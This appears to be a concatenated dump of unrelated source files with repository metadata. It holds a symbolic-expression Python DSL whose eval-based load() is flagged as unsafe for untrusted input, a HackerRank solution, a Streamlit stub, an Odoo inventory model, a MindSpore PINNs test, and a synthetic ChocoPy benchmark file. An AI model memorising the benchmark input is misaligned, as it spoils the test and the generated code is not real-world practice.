        return '{}({})'.format(type(self).__name__, inner)
class E(Base):
    """Symbolic expression node: args[0] is the operator tag, args[1:] the operands.

    Nearly every Python operator is overloaded to build a new E node instead of
    computing a value, so ordinary Python syntax constructs an expression tree.

    NOTE(review): because __eq__ is overloaded (and returns a node, not a bool),
    E instances are unhashable in Python 3 and cannot be used in sets or as
    dict keys. Also, Python coerces the result of __contains__ to bool, so
    `x in e` loses the ' in ' node it builds -- confirm whether that is intended.
    """
    @property
    def op(self):
        # Operator tag, e.g. '+', 'var', '[]'.
        return self.args[0]
    @property
    def exprs(self):
        # All operands (everything after the tag).
        return self.args[1:]
    @property
    def lhs(self):
        return self.args[1]
    @property
    def rhs(self):
        return self.args[2]
    @property
    def a1(self):
        # Alias for the first operand (same as lhs).
        return self.args[1]
    @property
    def a2(self):
        # Alias for the second operand (same as rhs).
        return self.args[2]
    # --- arithmetic / bitwise operators: each builds a 2-ary node tagged with the operator ---
    def __add__(self, rhs):
        return E('+',self,rhs)
    def __contains__(self, lhs):
        # NOTE(review): Python converts this result to bool at the `in` site.
        return E(' in ',lhs,self)
    def __truediv__(self, rhs):
        return E('/',self,rhs)
    def __floordiv__(self, rhs):
        return E('//',self,rhs)
    def __and__(self, rhs):
        return E('&',self,rhs)
    def __xor__(self, rhs):
        return E('^',self,rhs)
    def __invert__(self):
        # Unary operators use a trailing '_' in the tag to distinguish them.
        return E('~_',self)
    def __or__(self, rhs):
        return E('|',self,rhs)
    def __pow__(self, rhs):
        return E('**',self,rhs)
    def __getitem__(self, k):
        # Subscription: e[k] -> E('[]', e, k).
        return E('[]',self, k)
    def __lshift__(self, rhs):
        return E('<<',self, rhs)
    def __mod__(self, rhs):
        return E('%',self, rhs)
    def __mul__(self, rhs):
        return E('*',self, rhs)
    def __matmul__(self, rhs):
        return E('@',self, rhs)
    def __neg__(self):
        return E('-_',self)
    def __pos__(self):
        return E('+_',self)
    def __rshift__(self, rhs):
        return E('>>',self, rhs)
    def __sub__(self, rhs):
        return E('-',self, rhs)
    # --- comparisons: these also build nodes, so E cannot be sorted/compared normally ---
    def __lt__(self, rhs):
        return E('<',self, rhs)
    def __le__(self, rhs):
        return E('<=',self, rhs)
    def __eq__(self, rhs):
        return E('==',self, rhs)
    def __ne__(self, rhs):
        return E('!=',self, rhs)
    def __ge__(self, rhs):
        return E('>=',self, rhs)
    def __gt__(self, rhs):
        return E('>',self, rhs)
    def __call__(self, *args):
        # Call syntax: e(a, b) -> E('_()', e, a, b).
        return E('_()',self, *args)
def dolet(k,v): return E('=',k,v)  # build an assignment node: k = v
class LetClause(Base):
    """Builder returned by let(...); indexing it supplies the bound body."""
    def __getitem__(self, k):
        # A tuple subscript (let(x)[a, b]) is folded into a single ',' node.
        if isinstance(k,tuple):
            k=E(',',*k)
        return E('=',E('args',*self.args), k)
class Let:
    """Entry point for let-bindings: let(x)[expr] builds a clause via LetClause."""
    def __setitem__(self,k,v):
        # NOTE(review): BUG -- 'stmts' is not defined in any enclosing scope, so
        # `let[k] = v` raises NameError at runtime. It presumably was meant to
        # append to some statement accumulator; confirm intent before fixing.
        stmts += dolet(k,v)
    def __call__(self,*args):
        return LetClause(*args)
let=Let()
class Stmt:
    """Named statement builder: Stmt(op)[x] -> E(op, x); tuple subscripts fold into one ',' node."""
    def __init__(self,k):
        self.op = k  # the tag used for every node this builder produces
    def __getitem__(self, k):
        if isinstance(k,tuple):
            k=E(',',*k)
        return E(self.op, k)
# Use like:
# let(x)[x+1]
# or [let(x)[4], let(Y)[X+1]]
class Env:
    """Factory for named symbolic variables that also injects them into a globals dict.

    env.NAME (or env('NAME')) returns a cached E(op, 'NAME') node and, as a side
    effect, binds NAME in the captured globals mapping so the bare name resolves
    at the call site afterwards (see the REPL transcript at the bottom of this file).
    """
    def __init__(self, globals, op='var'):
        self.globals=globals  # mapping mutated on every first lookup (usually globals())
        self.vars=dict()      # cache: name -> node, so repeated lookups share one object
        self.op=op            # tag for created nodes, e.g. 'var'
    def __call__(self, name):
        if name not in self.vars:
            v=E(self.op, name)
            self.globals[name]=v  # side effect: make the bare name usable in caller code
            self.vars[name]=v
        return self.vars[name]
    def __getattr__(self, name):
        # Attribute access is sugar for __call__: env.X == env('X').
        return self(name)
# Shared default environment plus short aliases.
var=Env(globals())
v=var
arg=var
class OnClause:
    """Wrapper built by on(e); indexing it produces a conditional node."""
    def __init__(self, e):
        self.e=e  # the condition expression
    def __getitem__(self, rhs):
        if isinstance(rhs, slice):
            # on(e)[then:otherwise] -> ternary node; a slice step has no meaning here.
            assert(rhs.step is None)
            return E('?:', self.e, rhs.start, rhs.stop)
        else:
            # on(e)[then] -> one-armed conditional.
            return E('?', self.e, rhs)
class On:
    """Callable entry point: on(e) starts a conditional clause."""
    def __call__(self, e):
        return OnClause(e)
on=On()
IF=on  # alias so conditionals can read as IF(cond)[...]
class LambdaClause:
    """Holds a lambda's parameter list; indexing supplies the body."""
    def __init__(self, *args):
        self.args=args
    def __getitem__(self, rhs):
        return E('λ',self.args,rhs)
class LambdaDefiner:
    """Entry point: λ(x, y)[body] builds a lambda node."""
    def __call__(self, *args):
        # NOTE(review): passing the tuple positionally wraps the params twice
        # (LambdaClause.args becomes ((p1, p2, ...),)); the REPL transcript at
        # the bottom of the file shows the double nesting -- confirm intent.
        return LambdaClause(args)
λ=LambdaDefiner()
class Ref:
    """Placeholder for a shared node, identified by an integer uid within a RefMaker."""

    def __init__(self, r, uid):
        self.refmaker = r   # owning RefMaker; its .rees maps placeholders to real nodes
        self.uid = uid

    def __matmul__(self, rhs):
        # `ref @ node` registers node as this placeholder's referee.
        # Each uid may be bound exactly once.
        already_bound = self in self.refmaker.rees
        if already_bound:
            raise RuntimeError
        self.refmaker.rees[self] = rhs
        return rhs

    def __repr__(self):
        # Mirrors the save()/load() wire syntax, e.g. "3@R".
        return '{}@R'.format(self.uid)
class RefMaker:
    """Registry of Ref placeholders used when deserializing shared expression nodes."""

    def __init__(self):
        self.refs = dict()  # uid -> Ref placeholder
        self.rees = dict()  # Ref placeholder -> resolved node (filled by Ref.__matmul__)

    def __rmatmul__(self, uid):
        """Handles uid@self"""
        # Return the existing placeholder for uid, creating it on first use.
        try:
            return self.refs[uid]
        except KeyError:
            placeholder = Ref(self, uid)
            self.refs[uid] = placeholder
            return placeholder
def save(x):
    """Serialize expression graph x to a string of constructor calls.

    Two passes: mr() marks nodes reachable more than once; pr() then prints
    each shared node once with a 'uid@R@' prefix and refers to it as 'uid@R'
    afterwards, so shared structure survives a round-trip through load().
    """
    seen=set()
    many=set()  # ids of nodes reached at least twice -> need a uid on output
    def mr(x):
        # Pass 1: depth-first marking of shared nodes.
        if id(x) in seen:
            many.add(id(x))
        else:
            seen.add(id(x))
            if isinstance(x, Base):
                for a in x.args:
                    mr(a)
    mr(x)
    uids=dict() # ref id->ids  (id(node) -> uid assigned on first print)
    uid=1
    def pr(x):
        # Pass 2: emit constructor syntax, tagging shared nodes with their uid.
        nonlocal uid
        s=''
        if id(x) in many:
            if id(x) in uids:
                # Node already printed once: emit a bare back-reference.
                return f'{uids[id(x)]}@R'
            else:
                uids[id(x)]=uid
                s+=f'{uid}@R@'
                uid+=1
        if isinstance(x, Base):
            first=True
            s+=f'{type(x).__name__}('
            for arg in x.args:
                if first: first=False
                else: s+=','
                s+=pr(arg)
            s+=')'
        else:
            # Leaves rely on repr() round-tripping through eval() in load().
            s+=repr(x)
        return s
    return pr(x)
def load(s):
    """Rebuild an expression graph from a save() string.

    SECURITY NOTE(review): this eval()s s, so s must be trusted (i.e. produced
    by save()); never call load() on untrusted input.
    """
    global R
    # '@R' fragments in s resolve through this fresh, module-global maker.
    R=RefMaker()
    b=eval(s)
    seen=set()
    def resolve(x):
        # Replace every Ref placeholder with the node it was bound to,
        # mutating args in place (note: tuples become lists here).
        if id(x) not in seen:
            seen.add(id(x))
            if isinstance(x, Base):
                x.args=[resolve(a) for a in x.args]
        if isinstance(x, Ref):
            return R.rees[x]
        else:
            return x
    resolve(b)
    # NOTE(review): resolve()'s return value is discarded for the root, which
    # is fine unless the whole string is a bare back-reference -- confirm.
    return b
# >>> from sym import *
# >>> X=var.X
# >>> print(v.Y)
# E('var', 'Y')
# >>> a=[1,2]
# >>> a[0]=3
# >>> a[0]+=3
# >>> E('a','var')[3]
# E('[]', E('a', 'var'), 3)
# >>> a=v.a
# >>> a[0]
# E('[]', E('var', 'a'), 0)
# >>> v.X<v.Y
# E('<', E('var', 'X'), E('var', 'Y'))
# >>> v.X[v.X+1,]
# E('[]', E('var', 'X'), (E('+', E('var', 'X'), 1),))
# >>>
# >>> globals()['ai']=12
# >>> ai
# 12
# >>>
# >>> on(X)[3:4]
# E('?:', E('var', 'X'), 3, 4)
# >>> on(X)[3]
# E('?', E('var', 'X'), 3)
# >>> E(E('X','var'),'?',3)
# E(E('X', 'var'), '?', 3)
# >>> var.A
# E('var', 'A')
# >>> A
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# NameError: name 'A' is not defined
# >>> var=Env(globals())
# >>> var.A
# E('var', 'A')
# >>> A
# E('var', 'A')
# >>> E
# <class 'sym.E'>
# >>>
# >>> [getattr(var,x) for x in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ']
# [E('var', 'A'), E('var', 'B'), E('var', 'C'), E('var', 'D'), E('var', 'E'), E('var', 'F'), E('var', 'G'), E('var', 'H'), E('var', 'I'), E('var', 'J'), E('var', 'K'), E('var', 'L'), E('var', 'M'), E('var', 'N'), E('var', 'O'), E('var', 'P'), E('var', 'Q'), E('var', 'R'), E('var', 'S'), E('var', 'T'), E('var', 'U'), E('var', 'V'), E('var', 'W'), E('var', 'X'), E('var', 'Y'), E('var', 'Z')]
# >>> A
# E('var', 'A')
# >>> E
# E('var', 'E')
# >>> import fun
# >>> fun.E
# <class 'parle.sym.E'>
# >>> var.E
# E('var', 'E')
# >>> fun.E
# <class 'parle.sym.E'>
# >>> λ(X)[X+1]
# E('λ', ((E('var', 'X'),),), E('+', E('var', 'X'), 1))
# >>>
# >>>
# >>> let(X)
# LetClause(E('var', 'X'))
# >>> let(X)[X+1]
# E('=', E('args', E('var', 'X')), E('+', E('var', 'X'), 1))
# >>> LET=Stmt('let')
# >>>
# >>> LET(X)
# Traceback (most recent call last):
# File "<console>", line 1, in <module>
# TypeError: 'Stmt' object is not callable
# >>> LET[X]
# E('let', E('var', 'X'))
# >>>
|
[
"davidlovemore@gmail.com"
] |
davidlovemore@gmail.com
|
b5208a1ac2fd56dab09c83af59823316ebe6b71a
|
3bd40415aabba9ba705e8e20387d3521a48004eb
|
/Interview Preparation Kit/Dictionaries and Hashmaps/Hash Tables: Ransom Note.py
|
ab86513fa9454ca63732fa9788b15f6984fdcd4d
|
[] |
no_license
|
Narendran36/HackerRank
|
7da6f4ffc8a21031d3776c82e8969ca79eca0b06
|
f58ce1cfaa383ed8aec8ec10467048f6f8465624
|
refs/heads/master
| 2022-12-04T04:25:19.062493
| 2020-08-19T19:13:24
| 2020-08-19T19:13:24
| 256,822,744
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!/bin/python3
from collections import Counter
# Complete the checkMagazine function below.
def checkMagazine(magazine, note):
    """Print "Yes" if every word of note can be cut from magazine (with multiplicity), else "No"."""
    # Counter subtraction keeps only positive counts, so the result is empty
    # exactly when the magazine covers every word of the note.
    shortfall = Counter(note) - Counter(magazine)
    print("Yes" if not shortfall else "No")
if __name__ == '__main__':
    # stdin format (HackerRank): first line "m n", then the magazine words, then the note words.
    mn = input().split()
    m = int(mn[0])
    n = int(mn[1])
    # NOTE(review): m and n are parsed but never checked against the word lists below.
    magazine = input().rstrip().split()
    note = input().rstrip().split()
    checkMagazine(magazine, note)
|
[
"noreply@github.com"
] |
noreply@github.com
|
43fcc04dae20aad1bf6fb21779872c8b34188828
|
bf59fae2a9513c008bab786ea277ff88fe3b335c
|
/Nemisa_mvp/nemisa_app.py
|
43ac793ceefaf0125f2655be72ab8ed312a9f357
|
[] |
no_license
|
Simangele101/Nemisa_hack_2021
|
316320c493b67850da4ff2c9295ad51480d9c887
|
f56c3a51398090cc33008fde3314fdb130bd62b9
|
refs/heads/master
| 2023-04-22T19:53:30.902634
| 2021-04-16T16:20:20
| 2021-04-16T16:20:20
| 358,657,229
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 799
|
py
|
"""
Simple Streamlit webserver application for serving developed classification
models.
Author: Rogue byte Analytica.
Note:
---------------------------------------------------------------------
Please follow the instructions provided within the README.md file
located within this directory for guidance on how to use this script
correctly.
---------------------------------------------------------------------
For further help with the Streamlit framework, see:
https://docs.streamlit.io/en/latest/
"""
#import Dependencies
import streamlit as st
import datetime
import pandas as pd
def main():
    """Render the landing page of the Streamlit app."""
    st.header('Hello Nemisa Hackathon')
    # unsafe_allow_html is required for the raw <h3> markup below.
    st.write("<h3 align='center'>This is Rogue Byte Analytica</h3>",unsafe_allow_html=True)
if __name__ == '__main__':
    main()
|
[
"68602378+Simangele101@users.noreply.github.com"
] |
68602378+Simangele101@users.noreply.github.com
|
7126110b6be5e67ec95d040579d17ce5b4278f11
|
0b51bc6c7a98d07880955a31e147c0c15b1e3151
|
/tonkho/models/stock_quant.py
|
da383abe5fd406bbfc64072e6fd0731db111501c
|
[] |
no_license
|
tu95ctv/duan_mi2
|
72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975
|
f1728d99e27fcc18684d50f5719f3dcedcffd755
|
refs/heads/master
| 2020-04-28T21:30:25.017845
| 2019-07-07T13:25:43
| 2019-07-07T13:25:43
| 175,584,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,283
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError, ValidationError
from odoo.tools.translate import _
from odoo.tools.float_utils import float_compare
from odoo.addons.tutool.mytools import name_compute
from odoo.addons.tonkho.tonkho_tool import write_to_current_path
from odoo.addons.tutool.mytools import pn_replace
from lxml import etree
class Quant(models.Model):
    """ Quants are the smallest unit of stock physical instances.

    Extends the core stock.quant with denormalized product data, lot condition
    tracking, and department-scoped search helpers for the 'tonkho' warehouse
    module.
    """
    _inherit = "stock.quant"
    # Related product fields stored on the quant so they are searchable/groupable.
    pn = fields.Char(related='product_id.pn', store=True,string="Part number")
    categ_id = fields.Many2one('product.category', related='product_id.categ_id',store=True,string=u'Nhóm')
    thiet_bi_id = fields.Many2one('tonkho.thietbi',related='product_id.thiet_bi_id', string = u'Thiết bị',store=True)
    brand_id = fields.Many2one('tonkho.brand',related='product_id.brand_id',string=u'Hãng sản xuất',store=True)
    tracking = fields.Selection([
        ('serial', 'By Unique Serial Number'),
        ('none', 'No Tracking')], string=u"Có SN hay không", related='product_id.tracking',store=True)
    # Dynamic selection populated from parent warehouse locations (see method below).
    stock_location_id_selection = fields.Selection('get_stock_for_selection_field_',store=False)
    # Lot condition: 'tot' (good) / 'hong' (broken), mirrored from the lot.
    tinh_trang = fields.Selection([('tot',u'Tốt'),('hong',u'Hỏng')],default='tot',related='lot_id.tinh_trang',store=True,string=u'Tình trạng')
    ghi_chu = fields.Text(string=u'Ghi chú',related='lot_id.ghi_chu')
    # stt: presumably an ordinal/sequence number for display -- TODO confirm usage.
    stt = fields.Integer()
    inventory_line_id = fields.Many2one('stock.inventory.line')
    # ml_ids = fields.One2many('stock.move.line','lot_id',compute='ml_ids_',string=u'Các dòng điều chỉnh')
    # Move lines touching this quant's lot/product/location (computed, not stored).
    ml_ids = fields.Many2many('stock.move.line','stock_quant_stock_move_line_rel','quant_id','move_line_id',compute='ml_ids_',
                              string=u'Các dòng điều chỉnh')
    # @api.depends('is_done_ml_filter','is_your_department_filter','id_show')
    def ml_ids_(self):
        """Compute the stock.move.line records matching this quant's lot, product and location."""
        for r in self:
            # active_id = r.id_show
            domain = [('lot_id','=',r.lot_id.id),('product_id','=',r.product_id.id),'|',('location_id','=',r.location_id.id),('location_dest_id','=',r.location_id.id)]# r.id would be a NewId here, so it cannot be used
            # if r.is_done_ml_filter:
            #     domain.append(('state','=','done'))
            # if r.is_your_department_filter:
            #     your_department_id = self.env.user.department_id.id
            #     # department_domain = ['|',('location_id.department_id','=',your_department_id),('location_dest_id.department_id','=',your_department_id)]
            #     domain.extend(department_domain)
            r.ml_ids = self.env['stock.move.line'].search(domain,order='id desc')
    # is_done_ml_filter = fields.Boolean(default= True,store=False, string=u'Chỉ lọc dòng hoàn thành')
    # is_your_department_filter = fields.Boolean(default= True,store=False,string =u'Chỉ lọc kho đơn vị của bạn')
    # id_show = fields.Integer(compute='id_show_')
    # def id_show_(self):
    #     for r in self:
    #         r.id_show = r.id
    @api.model
    def create(self, values):
        """Create a quant, merging extra values injected via the 'update_inventory' context key."""
        if 'update_inventory' in self._context:
            values.update(self._context['update_inventory'])
        res = super(Quant, self).create(values)
        return res
    def get_stock_for_selection_field_(self):
        """Selection provider: one (name, name) pair per parent warehouse location."""
        locs = self.env['stock.location'].search([('is_kho_cha','=',True)])
        rs = list(map(lambda i:(i.name,i.name),locs))
        return rs
    # @api.constrains('lot_id')
    # def check_product_id(self):
    #     not_allow_check_lot_id_in_different_location =self.env['ir.config_parameter'].sudo().get_param('tonkho.not_allow_check_lot_id_in_different_location' )
    #     if not_allow_check_lot_id_in_different_location ==False:
    #         if self.lot_id:
    #             rs = self.env['stock.quant'].search([('lot_id','=',self.lot_id.id),('quantity','>',0)])
    #             if len(rs)>1:
    #                 raise UserError(u'Không được có quants nội bộ chung lot_id và quantity > 0 product:%s-sn: %s'%(self.product_id.name,self.lot_id.name))
    @api.constrains('location_id','quantity')
    def not_allow_negative_qty(self):
        """Block negative quantities unless the location explicitly allows them (cho_phep_am)."""
        for r in self:
            if not r.location_id.cho_phep_am:
                if r.quantity < 0:
                    raise UserError ( u' Kho:%s, không cho phép tạo âm- sản phẩm:%s-Serial number:%s'%(r.location_id.name,r.product_id.name,r.lot_id.name))
    # Override the stock-move view action: unlike core, do not filter by stock location.
    def action_view_stock_moves(self):
        """Open move lines for this quant's product/lot/package, across all locations."""
        self.ensure_one()
        action = self.env.ref('stock.stock_move_line_action').read()[0]
        action['domain'] = [
            ('product_id', '=', self.product_id.id),
            # '|', ('location_id', '=', self.location_id.id),
            # ('location_dest_id', '=', self.location_id.id),
            ('lot_id', '=', self.lot_id.id),
            ('package_id', '=', self.package_id.id)]
        return action
    def name_get(self):
        """Display name: "product [PN:..] | lot | quantity", built via name_compute."""
        res = []
        for r in self:
            adict=[
                ('product_id',{'pr':None,'func':lambda r: r.name + (' [PN:%s]'%r.pn if r.pn else '')}),
                # ('product_id',{'pr':None}),
                ('lot_id',{'pr':None,'func':lambda r: r.name,'skip_if_False':False}),
                ('quantity',{'pr':None,'func':lambda val:'%s'%val,'skip_if_False':False}),
            ]
            name = name_compute(r,adict,join_char = u' | ')
            res.append((r.id,name))
        return res
    @api.model
    def name_search(self, name, args=None, operator='ilike', limit=100):
        """Search by product name, normalized part number, or serial number.

        Honors the 'kho_da_chon' context key (ids already chosen in the UI) by
        excluding those records from the results.
        """
        args = args or []
        context = self._context or {}
        if context.get('kho_da_chon') !=None:
            choosed_list = context.get('kho_da_chon') [0][2]
            args +=[('id','not in',choosed_list)]
        if name:
            # pn_replace strips separators so "AB-12" also matches "AB12".
            pn_replace_str = pn_replace(name)
        else:
            pn_replace_str = ''
        recs = self.search(['|','|',('product_id', operator, name),('product_id.pn_replace', operator, pn_replace_str),('lot_id.name', operator, name)] + args, limit=limit)
        return recs.name_get()
    @api.model
    def search(self, args, offset=0, limit=None, order=None, count=False):
        """Search override applying the same 'kho_da_chon' context exclusion as name_search."""
        context = self._context or {}
        if context.get('kho_da_chon') !=None:
            choosed_list = context.get('kho_da_chon') [0][2]
            args +=[('id','not in',choosed_list)]
        return super(Quant, self).search(args, offset, limit, order, count=count)
    @api.constrains('quantity')
    def check_quantity(self):
        """A serial-tracked product may never have more than one unit per lot."""
        for quant in self:
            if float_compare(quant.quantity, 1, precision_rounding=quant.product_uom_id.rounding) > 0 and quant.lot_id and quant.product_id.tracking == 'serial':
                raise ValidationError(_('A serial number should only be linked to a single product. %s,%s,%s'%(quant.quantity,quant.product_id.name,quant.lot_id.name)))
    @api.model
    def fields_view_get(self, view_id=None, view_type='form', toolbar=False, submenu=False):
        """Inject a "filter by my department's warehouse" option into the search view."""
        res = super(Quant, self).fields_view_get(
            view_id=view_id, view_type=view_type, toolbar=toolbar, submenu=submenu)
        if view_type =='search':
            # write_to_current_path(u'%s'%res['arch'])
            # print ("res['arch']",res['arch'])
            doc = etree.fromstring(res['arch'])
            # Anchor the new filter right after the core 'locationgroup' filter.
            node = doc.xpath("//filter[@name='locationgroup']")[0]
            node.addnext(etree.Element('separator', {}))
            node.addnext(etree.Element('filter', {'string':'Lọc theo kho của trạm %s'%self.env.user.department_id.name,'name': 'loc_theo_tram_137', 'domain': "[('location_id.department_id','=',%s)]"%self.env.user.department_id.id}))
            res['arch'] = etree.tostring(doc, encoding='unicode')
        return res
|
[
"nguyenductu@gmail.com"
] |
nguyenductu@gmail.com
|
21f188524361b8fa84956085533990c2bc3dbde9
|
dcc25b784213b17015d2080a7623c772d474dc22
|
/reproduce/AlphaFold2-Chinese/tests/st/mindelec/networks/test_frequency_domain_maxwell/test_frequency_domain_maxwell.py
|
65c3d50f3c3832682e1414cb4e3413c5f6f49489
|
[
"LicenseRef-scancode-generic-cla",
"Apache-2.0"
] |
permissive
|
mindspore-ai/community
|
930c9d9fdbead852e3597d522a72fe5b66bfc005
|
c72ce898482419117550ad16d93b38298f4306a1
|
refs/heads/master
| 2023-07-19T19:43:20.785198
| 2023-07-17T06:51:22
| 2023-07-17T06:51:22
| 250,693,100
| 193
| 10
|
Apache-2.0
| 2022-10-29T10:01:40
| 2020-03-28T02:00:02
|
Python
|
UTF-8
|
Python
| false
| false
| 5,395
|
py
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""
train
"""
import os
import pytest
import numpy as np
import mindspore.nn as nn
import mindspore.ops as ops
from mindspore import context, ms_function
from mindspore.common import set_seed
from mindspore.train.callback import LossMonitor
from mindspore.train.loss_scale_manager import DynamicLossScaleManager
from mindelec.solver import Solver, Problem
from mindelec.geometry import Rectangle, create_config_from_edict
from mindelec.common import L2
from mindelec.data import Dataset
from mindelec.operators import SecondOrderGrad as Hessian
from mindelec.loss import Constraints
from src.config import rectangle_sampling_config, helmholtz_2d_config
from src.model import FFNN
from src.dataset import test_data_prepare
from src.callback import PredictCallback, TimeMonitor
set_seed(0)        # fix MindSpore's RNG so the training run is reproducible
np.random.seed(0)  # fix NumPy's RNG used by the geometry sampler
print("pid:", os.getpid())  # log worker pid (handy for attaching a profiler/debugger)
context.set_context(mode=context.GRAPH_MODE, save_graphs=False, device_target="Ascend")  # static graph mode on Ascend
# define problem
class Helmholtz2D(Problem):
    """2D Helmholtz equation: residual u_xx + u_yy + k^2*u on the interior,
    with a soft penalty pinning the boundary to sin(k*x)."""
    def __init__(self, domain_name, bc_name, net, wavenumber=2):
        super(Helmholtz2D, self).__init__()
        self.domain_name = domain_name  # dataset column holding interior sample points
        self.bc_name = bc_name          # dataset column holding boundary sample points
        self.type = "Equation"
        self.wave_number = wavenumber
        # Second-order derivatives of network output 0 w.r.t. input 0 (x) and input 1 (y).
        self.grad_xx = Hessian(net, input_idx1=0, input_idx2=0, output_idx=0)
        self.grad_yy = Hessian(net, input_idx1=1, input_idx2=1, output_idx=0)
        self.reshape = ops.Reshape()
    @ms_function
    def governing_equation(self, *output, **kwargs):
        """PDE residual u_xx + u_yy + k^2*u evaluated at the interior points."""
        u = output[0]
        # NOTE(review): x and y are sliced/reshaped but never used below --
        # candidates for removal once confirmed harmless under graph compilation.
        x = kwargs[self.domain_name][:, 0]
        y = kwargs[self.domain_name][:, 1]
        x = self.reshape(x, (-1, 1))
        y = self.reshape(y, (-1, 1))
        u_xx = self.grad_xx(kwargs[self.domain_name])
        u_yy = self.grad_yy(kwargs[self.domain_name])
        return u_xx + u_yy + self.wave_number**2 * u
    @ms_function
    def boundary_condition(self, *output, **kwargs):
        """Soft boundary penalty: 100 * (u - sin(k*x)) at boundary points."""
        u = output[0]
        # NOTE(review): y is unused here as well.
        x = kwargs[self.bc_name][:, 0]
        y = kwargs[self.bc_name][:, 1]
        x = self.reshape(x, (-1, 1))
        y = self.reshape(y, (-1, 1))
        test_label = ops.sin(self.wave_number * x)
        return 100 * (u - test_label)
@pytest.mark.level0
@pytest.mark.platform_arm_ascend_training
@pytest.mark.platform_x86_ascend_training
@pytest.mark.env_onecard
def test_frequency_domain_maxwell():
    """End-to-end PINNs training smoke test for the 2D Helmholtz problem.

    Builds the rectangle geometry and dataset, trains the FFNN for a few
    epochs on Ascend, and asserts the final relative L2 error and per-step
    time stay under fixed thresholds (which depend on the seeds set above).
    """
    net = FFNN(input_dim=2, output_dim=1, hidden_layer=64)
    # define geometry
    geom_name = "rectangle"
    rect_space = Rectangle(geom_name,
                           coord_min=helmholtz_2d_config["coord_min"],
                           coord_max=helmholtz_2d_config["coord_max"],
                           sampling_config=create_config_from_edict(rectangle_sampling_config))
    geom_dict = {rect_space: ["domain", "BC"]}
    # create dataset for train and test
    train_dataset = Dataset(geom_dict)
    train_data = train_dataset.create_dataset(batch_size=helmholtz_2d_config.get("batch_size", 128),
                                              shuffle=True, drop_remainder=False)
    test_input, test_label = test_data_prepare(helmholtz_2d_config)
    # define problem and constraints
    train_prob_dict = {geom_name: Helmholtz2D(domain_name=geom_name + "_domain_points",
                                              bc_name=geom_name + "_BC_points",
                                              net=net,
                                              wavenumber=helmholtz_2d_config.get("wavenumber", 2)),
                       }
    train_constraints = Constraints(train_dataset, train_prob_dict)
    # optimizer
    optim = nn.Adam(net.trainable_params(), learning_rate=helmholtz_2d_config.get("lr", 1e-4))
    # solver (O2 mixed precision with dynamic loss scaling)
    solver = Solver(net,
                    optimizer=optim,
                    mode="PINNs",
                    train_constraints=train_constraints,
                    test_constraints=None,
                    amp_level="O2",
                    metrics={'l2': L2(), 'distance': nn.MAE()},
                    loss_scale_manager=DynamicLossScaleManager()
                    )
    # train; PredictCallback records the L2 error against the analytic test data
    time_cb = TimeMonitor()
    loss_cb = PredictCallback(model=net, predict_interval=10, input_data=test_input, label=test_label)
    solver.train(epoch=helmholtz_2d_config.get("epochs", 10),
                 train_dataset=train_data,
                 callbacks=[time_cb, LossMonitor(), loss_cb])
    per_step_time = time_cb.get_step_time()
    l2_error = loss_cb.get_l2_error()
    print(f'l2 error: {l2_error:.10f}')
    print(f'per step time: {per_step_time:.10f}')
    assert l2_error <= 0.05
    assert per_step_time <= 10.0
|
[
"deanyuton@gmail.com"
] |
deanyuton@gmail.com
|
f64233795111df760e19371a35a584413081cff7
|
c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c
|
/cases/synthetic/class_def_attr-big-407.py
|
d189ce0fed43c4a777ecf1f02981982293253209
|
[] |
no_license
|
Virtlink/ccbench-chocopy
|
c3f7f6af6349aff6503196f727ef89f210a1eac8
|
c7efae43bf32696ee2b2ee781bdfe4f7730dec3f
|
refs/heads/main
| 2023-04-07T15:07:12.464038
| 2022-02-03T15:42:39
| 2022-02-03T15:42:39
| 451,969,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,297
|
py
|
# Synthetic benchmark input (ccbench/ChocoPy): parallel class families A*/B*/C*
# exercising typed class attributes, inheritance, and trivial __init__ bodies.
# Generated data -- not hand-maintained application code.
class A(object):
    x:int = 1
class A2(object):
    x:int = 1
    x2:int = 1
class A3(object):
    x:int = 1
    x2:int = 1
    x3:int = 1
class A4(object):
    x:int = 1
    x2:int = 1
    x3:int = 1
    x4:int = 1
class A5(object):
    x:int = 1
    x2:int = 1
    x3:int = 1
    x4:int = 1
    x5:int = 1
class B(A):
    def __init__(self: "B"):
        pass
class B2(A):
    def __init__(self: "B2"):
        pass
class B3(A):
    def __init__(self: "B3"):
        pass
class B4(A):
    def __init__(self: "B4"):
        pass
class B5(A):
    def __init__(self: "B5"):
        pass
class C(B):
    z:bool = True
class C2(B):
    z:bool = True
    z2:bool = True
class C3(B):
    z:bool = True
    z2:bool = True
    z3:bool = True
class C4(B):
    z:bool = True
    z2:bool = True
    z3:bool = True
    z4:bool = True
class C5(B):
    z:bool = True
    z2:bool = True
    z3:bool = True
    z4:bool = True
    z5:bool = True
# Exercise the class families: declare typed slots, instantiate, and touch
# attributes across the inheritance chain.
a:A = None
a2:A = None
a3:A = None  # was the unexpanded template token `$Literal` (a syntax error); None matches every sibling initializer
a4:A = None
a5:A = None
b:B = None
b2:B = None
b3:B = None
b4:B = None
b5:B = None
c:C = None
c2:C = None
c3:C = None
c4:C = None
c5:C = None
a = A()
a2 = A()
a3 = A()
a4 = A()
a5 = A()
b = B()
b2 = B()
b3 = B()
b4 = B()
b5 = B()
c = C()
c2 = C()
c3 = C()
c4 = C()
c5 = C()
a.x = 1
b.x = a.x
c.z = a.x == b.x
|
[
"647530+Virtlink@users.noreply.github.com"
] |
647530+Virtlink@users.noreply.github.com
|
917682f58de05483c2d7dcd124010513ed4badc8
|
a1f53b731fd1e3eb1923fb39fcb01477aa45f5c0
|
/blogapp/form.py
|
fb40e9ed2e05b6ad0de2524ac88315822acdc8f1
|
[] |
no_license
|
